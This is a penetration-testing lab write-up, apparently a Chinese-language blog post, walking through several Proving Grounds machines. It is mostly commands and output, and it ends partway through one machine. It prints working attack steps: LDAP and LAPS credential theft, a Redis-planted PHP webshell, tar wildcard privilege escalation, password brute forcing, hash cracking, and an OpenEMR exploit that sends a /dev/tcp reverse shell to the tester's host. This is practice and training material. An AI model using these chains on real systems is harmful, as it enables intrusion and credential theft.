\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Hutch]\n\u2514\u2500$ ldapsearch -x -H ldap:\/\/192.168.206.122 -s base namingcontexts\n\n# extended LDIF\n#\n# LDAPv3\n# base <> (default) with scope baseObject\n# filter: (objectclass=*)\n# requesting: namingcontexts \n#\n\n#\ndn:\nnamingcontexts: DC=hutch,DC=offsec\nnamingcontexts: CN=Configuration,DC=hutch,DC=offsec\nnamingcontexts: CN=Schema,CN=Configuration,DC=hutch,DC=offsec\nnamingcontexts: DC=DomainDnsZones,DC=hutch,DC=offsec\nnamingcontexts: DC=ForestDnsZones,DC=hutch,DC=offsec\n\n# search result\nsearch: 2\nresult: 0 Success\n\n# numResponses: 2\n# numEntries: 1\n                                                                                             \n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Hutch]\n\u2514\u2500$ ldapsearch -x -H ldap:\/\/192.168.206.122 -D '' -w '' -b \"DC=hutch,DC=offsec\"\n\n\u7701\u7565\n\n# Freddy McSorley, Users, hutch.offsec\ndn: CN=Freddy McSorley,CN=Users,DC=hutch,DC=offsec\nobjectClass: top\nobjectClass: person\nobjectClass: organizationalPerson\nobjectClass: user\ncn: Freddy McSorley\ndescription: Password set to CrabSharkJellyfish192 at user's request. Please c\n hange on next login.\ndistinguishedName: CN=Freddy McSorley,CN=Users,DC=hutch,DC=offsec\ninstanceType: 4\nwhenCreated: 20201104053505.0Z\nwhenChanged: 20210216133934.0Z\nuSNCreated: 12831\nuSNChanged: 49179\nname: Freddy McSorley\nobjectGUID:: TxilGIhMVkuei6KplCd8ug==\nuserAccountControl: 66048\nbadPwdCount: 0\ncodePage: 0\ncountryCode: 0\nbadPasswordTime: 132489437036308102\nlastLogoff: 0\nlastLogon: 132579563744834908\npwdLastSet: 132489417058152751\nprimaryGroupID: 513\nobjectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnWwQAAA==\naccountExpires: 9223372036854775807\nlogonCount: 2\nsAMAccountName: fmcsorley\nsAMAccountType: 805306368\nuserPrincipalName: fmcsorley@hutch.offsec\nobjectCategory: CN=Person,CN=Schema,CN=Configuration,DC=hutch,DC=offsec\ndSCorePropagationData: 20201104053513.0Z\ndSCorePropagationData: 16010101000001.0Z\nlastLogonTimestamp: 132579563744834908\nmsDS-SupportedEncryptionTypes: 0<\/code><\/pre>\n\n\n\n
Initial Access<\/h3>\n\n\n\n
\u7528 bloodhound-python \u6536\u96c6\u5b8c\u8cc7\u6599\u5f8c\uff0c\u5728 bloodhound \u4e2d\u770b\u5230\u76ee\u524d\u62ff\u5230\u7684 user \u5c0d\u65bc DC \u6709 ReadLAPSPassword \u53c3\u8003\u9019\u7bc7<\/a>\u62ff\u5230 administrator \u5bc6\u78bc\u4e26\u7528 winrm \u62ff\u5230 shell<\/p>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Hutch]\n\u2514\u2500$ bloodyAD -u fmcsorley -d hutch.offsec -p CrabSharkJellyfish192 --host 192.168.206.122 get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime\n\ndistinguishedName: CN=HUTCHDC,OU=Domain Controllers,DC=hutch,DC=offsec\nms-Mcs-AdmPwd: 5Q,C2{Xt&22]+4\nms-Mcs-AdmPwdExpirationTime: 133978075072851905\n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Hutch]\n\u2514\u2500$ evil-winrm -u 'administrator' -p '5Q,C2{Xt&22]+4' -i '192.168.206.122'\n                                        \nEvil-WinRM shell v3.7\n                                        \nWarning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline                                                          \n                                        \nData: For more information, check Evil-WinRM GitHub: https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion                                                                     \n                                        \nInfo: Establishing connection to remote endpoint\n*Evil-WinRM* PS C:\\Users\\Administrator\\Documents> whoami\nhutch\\administrator\n*Evil-WinRM* PS C:\\Users\\Administrator\\Documents>\n<\/code><\/pre>\n\n\n\n
Readys<\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.122.166<\/strong><\/strong><\/strong><\/td>TCP:22,80,6379<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
Web enumeration<\/p>\n\n\n\n
\u7db2\u7ad9\u662f wordpress CMS \uff0c\u7528 wpscan \u767c\u73fe\u4f7f\u7528 Plugin Site Editor 1.1.1 \uff0c\u6709 LFI \u6f0f\u6d1e\u4e14\u7121\u6cd5\u4f7f\u7528 log poisoning<\/strong>\u3001php filter chain<\/p>\n\n\n\n
Initial Access<\/h3>\n\n\n\n
\u900f\u904e LFI \u8b80\u53d6 redis \u7684 password \u3002\u5f97\u5230\u5bc6\u78bc Ready4Redis?<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Readys]\n\u2514\u2500$ curl http:\/\/192.168.122.166\/wp-content\/plugins\/site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/etc\/redis\/redis.conf > redis.conf\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n100 61899    0 61899    0     0   202k      0 --:--:-- --:--:-- --:--:--  203k\n                                                                                                                             \n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Readys]\n\u2514\u2500$ cat redis.conf | grep -i pass\n# 2) No password is configured.\n# If the master is password protected (using the \"requirepass\" configuration\n# masterauth <master-password>\n# resync is enough, just passing the portion of data the replica missed while\n# Require clients to issue AUTH <PASSWORD> before processing any other\n# 150k passwords per second against a good box. This means that you should\n# use a very strong password otherwise it will be very easy to break.\nrequirepass Ready4Redis?<\/code><\/pre>\n\n\n\n
\u767b\u5165 redis \uff0c\u4e26\u5c07 webshell \u5beb\u5165 \/dev\/shm\/ \u8b93 php \u53ef\u4ee5\u6b63\u5e38\u57f7\u884c<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Readys]\n\u2514\u2500$ redis-cli -h 192.168.122.166\n192.168.122.166:6379> AUTH Ready4Redis?\nOK\n192.168.122.166:6379> config set dir \/dev\/shm\/\nOK\n192.168.122.166:6379> config set dbfilename shell.php\nOK\n192.168.122.166:6379> set test \"<?php system($_GET['cmd']);?>\"\nOK\n192.168.122.166:6379> save<\/code><\/pre>\n\n\n\n
\u6210\u529f RCE<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Readys]\n\u2514\u2500$ curl \"http:\/\/192.168.122.166\/wp-content\/plugins\/site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/dev\/shm\/shell.php&cmd=id\" --output -\nREDIS0009\ufffd      redis-ver5.0.14\ufffd\n\ufffdedis-bits\ufffd@\ufffdctime\ufffd\ufffdLhused-mem\u2592\n aof-preamble\ufffd\ufffd\ufffdtestuid=1000(alice) gid=1000(alice) groups=1000(alice)\n\ufffd\ufffd\ufffd\ufffda\ufffd \ufffd{\"success\":true,\"data\":{\"output\":[]}} <\/code><\/pre>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Readys]\n\u2514\u2500$ rlwrap nc -lvnp 4444        \nlistening on [any] 4444 ...\nconnect to [192.168.45.228] from (UNKNOWN) [192.168.122.166] 44344\n<ite-editor\/editor\/extensions\/pagebuilder\/includes$ cd ~\ncd ~\nalice@readys:\/home\/alice$ ls\nls\nlocal.txt\nalice@readys:\/home\/alice$ cat local.txt\ncat local.txt\n29d1f99a096cca8ec9b2256ce644e3f6\nalice@readys:\/home\/alice$ <\/code><\/pre>\n\n\n\n
Privilege Escalation – crontab<\/h3>\n\n\n\n
\u5229\u7528 crontab \uff0c\u642d\u914d wildcard injection\uff0c\u8b93 tar \u57f7\u884c exp.sh \u3002<\/p>\n\n\n\n
alice@readys:\/var\/www\/html$ cat \/etc\/crontab\ncat \/etc\/crontab\n*\/3 * * * * root \/usr\/local\/bin\/backup.sh\nalice@readys:\/var\/www\/html$ cat \/usr\/local\/bin\/backup.sh\ncat \/usr\/local\/bin\/backup.sh\n#!\/bin\/bash\n\ncd \/var\/www\/html\nif [ $(find . -type f -mmin -3 | wc -l) -gt 0 ]; then\ntar -cf \/opt\/backups\/website.tar *\nfi\nalice@readys:\/var\/www\/html$ touch -- \"--checkpoint=1\"\ntouch -- \"--checkpoint=1\"\nalice@readys:\/var\/www\/html$ echo \"chmod +s \/bin\/bash\" > exp.sh\necho \"chmod +s \/bin\/bash\" > exp.sh\nalice@readys:\/var\/www\/html$ touch -- \"--checkpoint-action=exec=bash exp.sh\"\ntouch -- \"--checkpoint-action=exec=bash exp.sh\"\nalice@readys:\/var\/www\/html$ <\/code><\/pre>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
alice@readys:\/var\/www\/html$ ls -lh \/bin\/bash\nls -lh \/bin\/bash\n-rwsr-sr-x 1 root root 1.2M Apr 18  2019 \/bin\/bash\nalice@readys:\/var\/www\/html$ \/bin\/bash -p\n\/bin\/bash -p\nbash-5.0# cat \/root\/proof.txt\ncat \/root\/proof.txt\n023982c4b987b120aeffa6d4ede352cc\nbash-5.0# <\/code><\/pre>\n\n\n\n
Monster<\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.122.180<\/strong><\/strong><\/strong><\/td>TCP:80,135,139,443,445,3389,5040,7680<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
Web enumeration<\/strong><\/p>\n\n\n\n
\u8def\u5f91\u7206\u7834\u627e\u5230 \/blog \uff0c\u8dd1 Monstra 3.0.4 \uff0c\u6709 auth RCE \u3002\u4f7f\u7528 cewl \u628a\u7db2\u7ad9\u53ef\u80fd\u7684\u5e33\u5bc6\u6293\u4e0b\u4f86\u3002\u5617\u8a66\u7528\u6293\u4e0b\u4f86\u7684 list \u7206\u7834 admin \u7684\u5bc6\u78bc\uff0c\u6700\u7d42\u627e\u5230 wazowski<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Monster]\n\u2514\u2500$ cewl http:\/\/monster.pg\/index.html > list \n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Monster]\n\u2514\u2500$ hydra -l admin -P list monster.pg http-post-form \"\/blog\/admin\/index.php:login=^USER^&password=^PASS^&login_submit=Log+In:Wrong\" -v\n\nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2025-06-13 03:50:53\n[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, .\/hydra.restore\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 190 login tries (l:1\/p:190), ~12 tries per task\n[DATA] attacking http-post-form:\/\/monster.pg:80\/blog\/admin\/index.php:login=^USER^&password=^PASS^&login_submit=Log+In:Wrong\n[VERBOSE] Resolving addresses ... [VERBOSE] resolving done\n[VERBOSE] Page redirected to http[s]:\/\/monster.pg:80\/blog\/admin\/index.php\n[STATUS] attack finished for monster.pg (waiting for children to complete tests)\n[VERBOSE] Page redirected to http[s]:\/\/monster.pg:80\/blog\/admin\/index.php?id=dashboard\n[80][http-post-form] host: monster.pg   login: admin   password: wazowski\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2025-06-13 03:51:15<\/code><\/pre>\n\n\n\n
Initial Access<\/h3>\n\n\n\n
\u767b\u5165\u5f8c\u7de8\u8f2f blog \u7684 theme \uff0c\u6539\u6210 webshell \u53c3\u8003<\/a><\/p>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Monster]\n\u2514\u2500$ rlwrap nc -lvnp 4444                                       \nlistening on [any] 4444 ...\nconnect to [192.168.45.228] from (UNKNOWN) [192.168.122.180] 53344\nwhoami\nmike-pc\\mike\nPS C:\\xampp\\htdocs\\blog> cd ~\nPS C:\\Users\\Mike> type desktop\\local.txt\na3dc38ffa696f013f7dcd65332a290be<\/code><\/pre>\n\n\n\n
Privilege Escalation <\/h3>\n\n\n\n
\u5728\u7528 SMB \u50b3\u8f38\u6a94\u6848\u4e2d\uff0c\u6355\u7372\u5230 mike \u7684 ntlm hash \u4e26\u7834\u89e3\u5f97\u5230 Mike14<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Monster]\n\u2514\u2500$ cat hash                                                      \nMike::MIKE-PC:aaaaaaaaaaaaaaaa:8df70471d576d77b0fb23b9158c19fba:010100000000000080474cc03adcdb01d95d318659ffa1a300000000010010006a00590059006f004f004c0041006500030010006a00590059006f004f004c004100650002001000740067004d0069006b0045004c00760004001000740067004d0069006b0045004c0076000700080080474cc03adcdb01060004000200000008003000300000000000000000000000002000006b1697aa64514bb88a88537a904a2e212ffe02a1d991aae4f32695b6c1fb678f0a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00340035002e003200320038000000000000000000\n                                                                                                                             \n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Monster]\n\u2514\u2500$ hashcat -m 5600 hash --show                          \nMIKE::MIKE-PC:aaaaaaaaaaaaaaaa:8df70471d576d77b0fb23b9158c19fba:010100000000000080474cc03adcdb01d95d318659ffa1a300000000010010006a00590059006f004f004c0041006500030010006a00590059006f004f004c004100650002001000740067004d0069006b0045004c00760004001000740067004d0069006b0045004c0076000700080080474cc03adcdb01060004000200000008003000300000000000000000000000002000006b1697aa64514bb88a88537a904a2e212ffe02a1d991aae4f32695b6c1fb678f0a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00340035002e003200320038000000000000000000:Mike14<\/code><\/pre>\n\n\n\n
\u62ff\u5230\u5f8c RDP \u767b\u5165\uff0c\u67e5\u770b readme_en.txt \u78ba\u8a8d xampp \u7248\u672c 7.3.10 \u6709\u53ef\u4ee5\u63d0\u6b0a\u7684 poc<\/a><\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Monster]\n\u2514\u2500$ rlwrap nc -lvnp 4444\nlistening on [any] 4444 ...\nconnect to [192.168.45.228] from (UNKNOWN) [192.168.122.180] 57745\nWindows PowerShell running as user Administrator on MIKE-PC\nCopyright (C) Microsoft Corporation. All rights reserved.\n\nwhoami\nmike-pc\\administrator\nPS C:\\WINDOWS\\system32> <\/code><\/pre>\n\n\n\n
Apex<\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.122.145<\/strong><\/strong><\/strong><\/td>TCP:80,445,3306<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
smb enumeration<\/strong><\/p>\n\n\n\n
smb \u533f\u540d\u767b\u5165\u53ef\u4ee5\u8a2a\u554f \/docs<\/p>\n\n\n\n
web enumeration<\/strong><\/p>\n\n\n\n
\u5728 \/openemr \u904b\u884c openemr \uff0c\u6709 auth RCE \u6f0f\u6d1e\u3002\u5728 \/filemanager \u904b\u884c Responsive FileManager\uff0c\u6709 Path Traversal \u3002<\/p>\n\n\n\n
Initial Access<\/h3>\n\n\n\n
\u4f7f\u7528 exploit<\/a> \u5229\u7528 Path Traversal \u53bb\u8b80\u53d6 openemr \u7684 sql \u5e33\u5bc6\u8a2d\u5b9a\u6a94\u6848\uff0c\u67e5\u8a62\u5f8c\u767c\u73fe\u662f openemr\/sites\/default\/sqlconf.php\u3002\u4f46\u662f\u56e0\u70ba Responsive FileManager \u6c92\u8fa6\u6cd5\u4e0a\u50b3 php \uff0c\u66f4\u6539 exploit \uff0cdata=”path=Documents”\uff0c\u518d\u7528 smb \u53bb\u8b80\u53d6<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Apex]\n\u2514\u2500$ python3 49359 http:\/\/192.168.122.145 PHPSESSID=1imr2gc3hi502pe6v89elpq697 \/var\/www\/openemr\/sites\/default\/sqlconf.php \n[*] Copy Clipboard\n[*] Paste Clipboard<\/code><\/pre>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Apex]\n\u2514\u2500$ smbclient  \/\/192.168.122.145\/docs -N                 \nTry \"help\" to get a list of possible commands.\nsmb: \\> dir\n  .                                   D        0  Thu Jun 12 23:12:21 2025\n  ..                                  D        0  Thu Jun 12 22:55:39 2025\n  passwd                              N     1607  Thu Jun 12 23:11:48 2025\n  sqlconf.php                         N      639  Thu Jun 12 23:12:21 2025\n  OpenEMR Success Stories.pdf         A   290738  Fri Apr  9 11:47:12 2021\n  OpenEMR Features.pdf                A   490355  Fri Apr  9 11:47:12 2021\n\n                16446332 blocks of size 1024. 10835424 blocks available\nsmb: \\>\n\n---\n\n<?php\n\/\/  OpenEMR\n\/\/  MySQL Config\n\n$host   = 'localhost';\n$port   = '3306';\n$login  = 'openemr';\n$pass   = 'C78maEQUIEuQ';\n$dbase  = 'openemr';<\/code><\/pre>\n\n\n\n
\u4f7f\u7528 mysql \u5e33\u5bc6\u767b\u5165\u5f8c\u62ff\u5230 username & password hash \uff0c\u4e26\u7834\u89e3 hash \u5f97\u5230 plaintext thedoctor<\/p>\n\n\n\n
MariaDB [openemr]> select username,password from users_secure;\n+----------+--------------------------------------------------------------+\n| username | password                                                     |\n+----------+--------------------------------------------------------------+\n| admin    | $2a$05$bJcIfCBjN5Fuh0K9qfoe0eRJqMdM49sWvuSGqv84VMMAkLgkK8XnC |\n+----------+--------------------------------------------------------------+\n1 row in set (0.069 sec)\n\nMariaDB [openemr]><\/code><\/pre>\n\n\n\n
\u4f7f\u7528 exploit<\/a><\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Apex]\n\u2514\u2500$ python2 45161 http:\/\/192.168.122.145\/openemr -u admin -p thedoctor -c 'bash -i >& \/dev\/tcp\/192.168.45.228\/80 0>&1'\n .---.  ,---.  ,---.  .-. .-.,---.          ,---.    \n\/ .-. ) | .-.\\ | .-'  |  \\| || .-'  |\\    \/|| .-.\\   \n| | |(_)| |-' )| `-.  |   | || `-.  |(\\  \/ || `-'\/   \n| | | | | |--' | .-'  | |\\  || .-'  (_)\\\/  ||   (    \n\\ `-' \/ | |    |  `--.| | |)||  `--.| \\  \/ || |\\ \\   \n )---'  \/(     \/( __.'\/(  (_)\/( __.'| |\\\/| ||_| \\)\\  \n(_)    (__)   (__)   (__)   (__)    '-'  '-'    (__) \n                                                       \n   ={   P R O J E C T    I N S E C U R I T Y   }=    \n                                                       \n         Twitter : @Insecurity                       \n         Site    : insecurity.sh                     \n\n[$] Authenticating with admin:thedoctor\n[$] Injecting payload<\/code><\/pre>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Apex\/OpenEMR-RCE]\n\u2514\u2500$ rlwrap nc -lvnp 80       \nlistening on [any] 80 ...\nconnect to [192.168.45.228] from (UNKNOWN) [192.168.122.145] 59386\nbash: cannot set terminal process group (1402): Inappropriate ioctl for device\nbash: no job control in this shell\nwww-data@APEX:\/var\/www\/openemr\/interface\/main$ cd ~\ncd ~\nwww-data@APEX:\/var\/www$ ls\nls\nhtml\nopenemr\nwww-data@APEX:\/var\/www$ cd \/home\ncd \/home\nwww-data@APEX:\/home$ ls\nls\nwhite\nwww-data@APEX:\/home$ cd white\ncd white\nwww-data@APEX:\/home\/white$ ls\nls\nlocal.txt\nwww-data@APEX:\/home\/white$ cat local.txt\ncat local.txt\n601e0819f26b5258cfa96d45425dc970<\/code><\/pre>\n\n\n\n
Privilege Escalation<\/h3>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
www-data@APEX:\/$ su root\nsu root\nPassword: thedoctor\n\nroot@APEX:\/# cat \/root\/proof.txt\ncat \/root\/proof.txt\n454dc757f3649c9acae3516c203e9d65\nroot@APEX:\/# <\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
Postfish<\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.162.137<\/strong><\/strong><\/td>TCP:22,25,80,110,143,993,995<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
smtp enumeration<\/strong><\/p>\n\n\n\n
\u4f7f\u7528\u5f9e\u7db2\u7ad9\u6536\u96c6\u4e0b\u4f86\u7684 list<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Postfish]\n\u2514\u2500$ cewl http:\/\/postfish.off\/ > list<\/code><\/pre>\n\n\n\n
\u627e\u5230\u5169\u500b\u7528\u6236<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Postfish]\n\u2514\u2500$ smtp-user-enum -M VRFY -U list -D postfish.off -t 192.168.162.137 \nStarting smtp-user-enum v1.2 ( http:\/\/pentestmonkey.net\/tools\/smtp-user-enum )\n\n ----------------------------------------------------------\n|                   Scan Information                       |\n ----------------------------------------------------------\n\nMode ..................... VRFY\nWorker Processes ......... 5\nUsernames file ........... list\nTarget count ............. 1\nUsername count ........... 117\nTarget TCP port .......... 25\nQuery timeout ............ 5 secs\nTarget domain ............ postfish.off\n\n######## Scan started at Thu Jun 12 08:03:02 2025 #########\n192.168.162.137: Sales@postfish.off exists\n192.168.162.137: Legal@postfish.off exists\n######## Scan completed at Thu Jun 12 08:03:10 2025 #########\n2 results.\n\n117 queries in 8 seconds (14.6 queries \/ sec)<\/code><\/pre>\n\n\n\n
\u4f7f\u7528 weak password sales\/sales \u8b80\u53bb\u5230 mail \u5167\u5bb9<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Postfish]\n\u2514\u2500$ curl \"imap:\/\/postfish.off\/INBOX;MAILINDEX=1\" --user sales:sales\nReturn-Path: <it@postfish.off>\nX-Original-To: sales@postfish.off\nDelivered-To: sales@postfish.off\nReceived: by postfish.off (Postfix, from userid 997)\n        id B277B45445; Wed, 31 Mar 2021 13:14:34 +0000 (UTC)\nReceived: from x (localhost [127.0.0.1])\n        by postfish.off (Postfix) with SMTP id 7712145434\n        for <sales@postfish.off>; Wed, 31 Mar 2021 13:11:23 +0000 (UTC)\nSubject: ERP Registration Reminder\nMessage-Id: <20210331131139.7712145434@postfish.off>\nDate: Wed, 31 Mar 2021 13:11:23 +0000 (UTC)\nFrom: it@postfish.off\n\nHi Sales team,\n\nWe will be sending out password reset links in the upcoming week so that we can get you registered on the ERP system.\n\nRegards,\nIT<\/code><\/pre>\n\n\n\n
\u5728\u7db2\u7ad9 \/team.html \u53ef\u4ee5\u770b\u5230 Sales team \u7684 member \u662f Brian Moore\uff0c\u4f7f\u7528 usernamer.py<\/a> \u4f86\u751f\u6210\u53ef\u80fd\u7684\u7528\u6236\u540d\u5b57\uff0c\u518d\u5c07\u9019\u4e9b\u7528 smtp \u53bb\u9a57\u8b49\u54ea\u500b\u771f\u6b63\u7684\u7528\u6236\u540d\uff0c\u5f97\u5230\u7528\u6236\u540d\u662f Brian.Moore<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Postfish]\n\u2514\u2500$ python2 ~\/tools\/usernamer.py -n \"Brian Moore\" > BrianMoore.test\n                                                                                                                             \n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Postfish]\n\u2514\u2500$ smtp-user-enum -M VRFY -U BrianMoore.test -D postfish.off -t 192.168.162.137 \nStarting smtp-user-enum v1.2 ( http:\/\/pentestmonkey.net\/tools\/smtp-user-enum )\n\n ----------------------------------------------------------\n|                   Scan Information                       |\n ----------------------------------------------------------\n\nMode ..................... VRFY\nWorker Processes ......... 5\nUsernames file ........... BrianMoore.test\nTarget count ............. 1\nUsername count ........... 93\nTarget TCP port .......... 25\nQuery timeout ............ 5 secs\nTarget domain ............ postfish.off\n\n######## Scan started at Thu Jun 12 08:31:35 2025 #########\n192.168.162.137: @postfish.off exists\n192.168.162.137: Brian.Moore@postfish.off exists\n######## Scan completed at Thu Jun 12 08:31:40 2025 #########\n2 results.\n\n93 queries in 5 seconds (18.6 queries \/ sec)<\/code><\/pre>\n\n\n\n
Initial Access<\/h3>\n\n\n\n
\u7528 IT \u7684 mail \u5bc4\u4fe1\u7d66 Brain.Moore<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Postfish]\n\u2514\u2500$ swaks -f it@postfish.off -t Brian.Moore@postfish.off -h \"a\" --body \"http:\/\/192.168.45.228\/\"                   \n=== Trying postfish.off:25...\n=== Connected to postfish.off.\n<-  220 postfish.off ESMTP Postfix (Ubuntu)\n -> EHLO a\n<-  250-postfish.off\n<-  250-PIPELINING\n<-  250-SIZE 10240000\n<-  250-VRFY\n<-  250-ETRN\n<-  250-STARTTLS\n<-  250-ENHANCEDSTATUSCODES\n<-  250-8BITMIME\n<-  250-DSN\n<-  250-SMTPUTF8\n<-  250 CHUNKING\n -> MAIL FROM:<it@postfish.off>\n<-  250 2.1.0 Ok\n -> RCPT TO:<Brian.Moore@postfish.off>\n<-  250 2.1.5 Ok\n -> DATA\n<-  354 End data with <CR><LF>.<CR><LF>\n -> Date: Thu, 12 Jun 2025 08:44:35 -0400\n -> To: Brian.Moore@postfish.off\n -> From: it@postfish.off\n -> Subject: test Thu, 12 Jun 2025 08:44:35 -0400\n -> Message-Id: <20250612084435.1016118@kali>\n -> X-Mailer: swaks v20240103.0 jetmore.org\/john\/code\/swaks\/\n -> \n -> http:\/\/192.168.45.228\/\n -> \n -> \n -> .\n<-  250 2.0.0 Ok: queued as 85107458F8\n -> QUIT\n<-  221 2.0.0 Bye\n=== Connection closed with remote host.<\/code><\/pre>\n\n\n\n
\u6536\u5230\u91cd\u81f3\u7684\u5bc6\u78bc EternaLSunshinE<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Postfish]\n\u2514\u2500$ nc -lvnp 80\nlistening on [any] 80 ...\nconnect to [192.168.45.228] from (UNKNOWN) [192.168.162.137] 34108\nPOST \/ HTTP\/1.1\nHost: 192.168.45.228\nUser-Agent: curl\/7.68.0\nAccept: *\/*\nContent-Length: 207\nContent-Type: application\/x-www-form-urlencoded\n\nfirst_name%3DBrian%26last_name%3DMoore%26email%3Dbrian.moore%postfish.off%26username%3Dbrian.moore%26password%3DEternaLSunshinE%26confifind \/var\/mail\/ -type f ! -name sales -delete_password%3DEternaLSunshinE <\/code><\/pre>\n\n\n\n
\u7528 SSH login <\/p>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
brian.moore@postfish:~$ cat local.txt \n72e4ab3b54a1f2ab42dcfef18b63ee9f\nbrian.moore@postfish:~$ <\/code><\/pre>\n\n\n\n
Privilege Escalation<\/h3>\n\n\n\n
sudo version 1.8.31 \u4f7f\u7528 exploit<\/a> <\/p>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
brian.moore@postfish:~$ python3 exploit_nss.py\n# id\nuid=0(root) gid=0(root) groups=0(root),8(mail),997(filter),1000(brian.moore)\n# cat \/root\/proof.txt\n3cfa5aed38d464cf6b4c6ca82d6ef711\n# ^C<\/code><\/pre>\n\n\n\n
Hepet<\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.162.140<\/strong><\/td>TCP:25,79,105,106,110,135,139,143,443,445,2224,5040,8000,11100,2001,33006<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
web enumeration<\/strong><\/p>\n\n\n\n
\u6536\u96c6\u7db2\u9801\u4e0a\u6709\u7684\u8cc7\u8a0a\u6587\u5b57\uff0c\u53ef\u80fd\u6709\u5e33\u865f\u5bc6\u78bc<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Hepet]\n\u2514\u2500$ cewl http:\/\/192.168.162.140:8000\/ > list <\/code><\/pre>\n\n\n\n
imap enumeration<\/strong><\/p>\n\n\n\n
\u900f\u904e smtp-user-enum \u627e\u5230\u4e94\u500b\u7528\u6236<\/p>\n\n\n\n
